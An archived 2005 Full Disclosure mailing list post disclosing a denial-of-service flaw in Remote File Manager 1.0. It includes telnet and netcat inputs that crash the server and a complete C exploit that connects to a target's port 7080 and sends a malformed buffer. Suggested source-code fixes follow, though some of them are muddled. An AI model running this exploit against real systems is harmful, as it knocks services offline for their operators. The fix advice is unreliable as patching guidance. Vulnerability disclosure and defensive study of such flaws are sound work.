Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Server Remote File Manager DOS Exploit
From: "eric basher" <basher13 () linuxmail org>
Date: Sun, 08 May 2005 23:26:04 +0800

Update:
8:13 PM 5/7/2005


Subject:
" Server Remote File Manager DOS Exploit "


Vulnerable version:
Remote File Manager  1.0




Description:
Remote File Manager has function for client/server program ,allows user to 
remotely manage files on another computer via Winsock. 
It includes: upload file, download file, delete file, remove directory, 
get file information, and execute file. 




Vulnerability:
A denial of service or buffer overflow condition occurs when a 
text string is sent to the service data application.When is server
file manager connected/listening for incoming data from client,
sure is client not connected to server,we can send a text string
into server application that cause the program is disconnected/restarted.

Try use telnet then connect to specified IP and Port (ussualy port 7080),
sample;

telnet localhost 7080
Connected..
<text> 'send text,this could server has recive type unformatted string,
that server need to close.

Take a look on mudules ModSession.bas;
dRet = Format(Bytes / 1024, "####################.##")

The source debug code will show,like;
Run-time error '13':
Type mismatch

This cause the size chunk has string '#'its not a empty field or 
has no number 
Other else we can use netcat to sending information file that can
cause server FileServer to crash,sample;

X:\>nc -vv localhost 7080
DNS fwd/rev mismatch: infamous-group != localhost
infamous-group [127.0.0.1] 7080 (?) open
FIN"/files

The source debug code will show,like;
Run-time error '9':
Subscript out of range

Take a look on ParseGetFileInfo ModSession.bas;
(..)
Set objFSO = New FileSystemObject
If Not objFSO.FileExists(sBuff(1)) Then ' Vulnerable string
sPacket = "FIN" & DELIM & "NonExist"
(..)

"FIN" this comand to get file information: "FIN"/File path
,if file is exists,the handle for script will cause out of range 
this could the program need to be restarted. 



Exploit:
/*
 
  Server Remote File Manager DoS Exploit
-------------------------------------------
   INFGP - Hacking&security Research


[+] Attacking  localhost..
[+] Build DOS string
[+] Buffer size = 300 byte
[+] Sending bad format..
[+] localhost  : Disconected!


Greats: Infam0us Gr0up,Zone-H,securiteam,str0ke-milw0rm,addict3d,
Thomas-secunia,Yudha,c0d3r,Kavling Community,1st Indonesian Security,
Jasakom,ECHO,etc..betst reagrds t0 whell.
Info: 98.to/infamous

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define size 300

int main (int argc, char *argv[]){

char req[] =
"M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYNKG&MKL\?X.JIY.HS&"
"<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYNKG&MKL\?"
"X.JIY.HS&<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-YSYN"
"KG&MKL\?X.JIY.HS&<GMN?X+9M_MZ?S.Y?XPKL&>UM&<_.H;YBKL7-"
"qv#trog.ro#mkodph>qv#trog.ro#mkodph\n";

  unsigned int rc,addr,inetsock ;
  struct sockaddr_in tcp;
  struct hostent * hp;
  WSADATA wsaData;
  char buffer[size];

   memset(buffer,'A',300);
   memcpy(buffer,req,25);

   if(argc < 2) {
  printf("\n\n    Server Remote File Manager DoS Exploit \n", argv[0]);
  printf("   -----------------------------------------\n", argv[0]);
  printf("      INFGP - Hacking&Security Research\n\n", argv[0]);
  printf("[-]Usage: %s [target]\n", argv[0]); 
  printf("[?]Exam: %s localhost \n", argv[0]); 
  exit(-1) ;
        }
  
  if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
   printf("WSAStartup failed !\n");
   exit(-1);
  }
   hp = gethostbyname(argv[1]);
  if (!hp){
   addr = inet_addr(argv[1]);
  }
  if ((!hp) && (addr == INADDR_NONE) ){
   printf("Unable to resolve %s\n",argv[1]);
   exit(-1);
  }
  inetsock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  if (!inetsock){
   printf("socket() error...\n");
   exit(-1);
  }
   if (hp != NULL)
   memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
  else
   tcp.sin_addr.s_addr = addr;

  if (hp)
   tcp.sin_family = hp->h_addrtype;
  else
   tcp.sin_family = AF_INET;

  tcp.sin_port=htons(7080);
  
  printf("\n[+] Attacking  %s..\n" , argv[1]) ;
  printf("[+] Build DOS string\n");
  Sleep(1000);
  printf("[+] Buffer size = %d byte\n" , sizeof(buffer));
  rc=connect(inetsock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
  if(rc==0)
  {
    
  Sleep(1000) ;
  printf("[+] Sending bad format..\n") ;
  send(inetsock , buffer , sizeof(buffer) , 0);
  printf("[+] %s  : Disconected! \n\n" ,  argv[1]) ;
}
  else {
  printf("[-] Port :7080 is invalid.Server not connected!\n");
 }
}  



Solution:
vendor was notified.
Other advice at mudules ModSession.bas,delete string '#' ;
dRet = Format(Bytes / 1024, "####################.##") ' Vulnerbale string
'#'delete this string to empty field ('dRet = Format(Bytes / 1024, "")')

Take a look on ParseGetFileInfo ModSession.bas;
(..)
Set objFSO = New FileSystemObject
If Not objFSO.FileExists(sBuff(1)) Then ' Vulnerable string
sPacket = "FIN" & DELIM & "NonExist"
(..)
Changes sBuff to 0 ,sample;
If Not objFSO.FileExists(sBuff(1))'Make 1 changes to 0 'sBuff(0))

This make a server File Server keep a going working as well.



Vendor URL:
http://www.niteenterprises.com/





Security Audit Tools:
http://user.7host/stardawn/files/Srfmdos.zip




Credits:
Published by - basher13[basher13 () linuxmail org]
-- 
_______________________________________________
Check out the latest SMS services @ http://www.linuxmail.org
This allows you to send and receive SMS through your mailbox.

Powered by Outblaze
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • Server Remote File Manager DOS Exploit eric basher (May 08)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault